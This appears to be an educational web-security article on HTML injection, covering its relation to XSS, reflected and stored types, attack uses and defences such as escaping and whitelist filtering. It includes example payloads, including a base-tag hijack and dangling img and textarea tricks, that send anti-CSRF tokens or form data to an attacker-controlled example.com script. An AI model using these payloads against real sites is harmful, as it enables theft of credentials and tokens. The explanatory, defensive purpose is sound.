HTML injections (HyperText Markup Language injections) are vulnerabilities that are very similar to Cross-site Scripting (XSS). The delivery mechanisms are exactly the same but the injected content is pure HTML tags, not a script like in the case of XSS. HTML injections are less dangerous than XSS but they may still be used for malicious purposes.
Similarities to Cross-site Scripting
Just like Cross-site Scripting, an HTML injection happens when the payload supplied by the malicious user as part of untrusted input is executed client-side by the web browser as part of the HTML code of the web application. HTML injection attacks are purely client-side and just like XSS attacks, they affect the user, not the server.
There are two major types of HTML injection: reflected and stored, just like in the case of XSS vulnerabilities. In the case of a reflected HTML injection, the payload must be delivered to each user individually (usually using social engineering, as a malicious link) and becomes part of the request. In the case of a stored HTML injection, the payload is stored by the web server and delivered later potentially to multiple users.
HTML Injection Examples
Attackers may use HTML injections for several purposes. Here are some of the most popular applications of this attack technique along with potential consequences to web application security.
Using or Harming the Reputation of the Web Page
The simplest application of HTML injection is to change the visible content of the page. For example, an attacker may use a stored HTML injection to inject a visual advertisement of a product that they want to sell. A similar case would be when the attacker injects malicious HTML that aims to harm the reputation of the page, for example, for political or personal reasons.
In both these cases, the injected content aims to look like a legit part of the HTML page. And in both these cases, a stored HTML injection vulnerability would be required by the attacker.
Exfiltrating Sensitive User Data
Another common application of HTML injection is to create a form on the target page and get the data entered in that form. For example, the attacker may inject malicious code with a fake login form. The form data (login and password) would then be sent to a server controlled by the attacker.
If the web page uses relative URLs, the attacker may also attempt to use the
<base> tag to hijack data. For example. if they inject
<base href='http://example.com/'> and the web page uses relative URLs for form submission, all the forms would be sent to the attacker instead.
The attacker may also hijack valid HTML forms by injecting a
<form> tag before a legitimate
<form> tag. Form tags cannot be nested and the top-level form tag is the one that takes precedence.
In all these cases, the attacker may use a reflected HTML injection just as well as a stored HTML injection.
Exfiltrating Anti-CSRF Tokens
An attacker may use HTML injection to exfiltrate anti-CSRF tokens in order to perform a Cross-site Request Forgery (CSRF) attack later. Anti-CSRF tokens are usually provided using the hidden input type in a form.
To exfiltrate the token, the attacker may, for example, use a non-terminated
<img> tag like
<img src='https://example.com/record.php? – the lack of closing single quote causes the rest of the content to become part of the URL until another single quote is found. If valid code uses double quotes instead, the hidden input will be sent to attacker-controlled record.php script and recorded:
<img src='https://example.com/record.php?<input type="hidden" name="anti_xsrf" value="s74bogj63h">
Another option is to use the
<textarea> tag. In such case, all content after the
<textarea> tag will be submitted and both the
<form> tags will be implicitly closed. However, in this case, the user must actually be tricked into submitting the form manually.
<form action='http://example.com/record.php?'<textarea><input type="hidden" name="anti_xsrf" value="s74bogj63h">
Exflitrating Passwords Stored in the Browser
HTML injections can also be used by attackers to place forms that are automatically filled by browser password managers. If the attacker manages to inject a suitable form, the password manager automatically inserts user credentials. In the case of many browsers, the form must just have the right field names and structure and the action parameter may point to any host.
There are a lot of other potential uses of HTML injections. To learn more, we recommend that you read an excellent cheat sheet by Michał Zalewski (lcamtuf). However, even the above applications should be enough for you to realize that while HTML injection may not be as dangerous as, for example, SQL injection, you should not ignore this type of attack.
Defending Against HTML Injections
Defense against HTML injections should be combined with defense against Cross-site Scripting. Just like in the case of XSS, you can either aim to filter out the HTML content from the input (but a lot of tricks can be used to evade filters) or escape all HTML tags.
While the second approach is much more effective, it may make it difficult if, by design, user input should contain some allowed HTML code. In such a case, a very strict, whitelist-based filtering approach is recommended.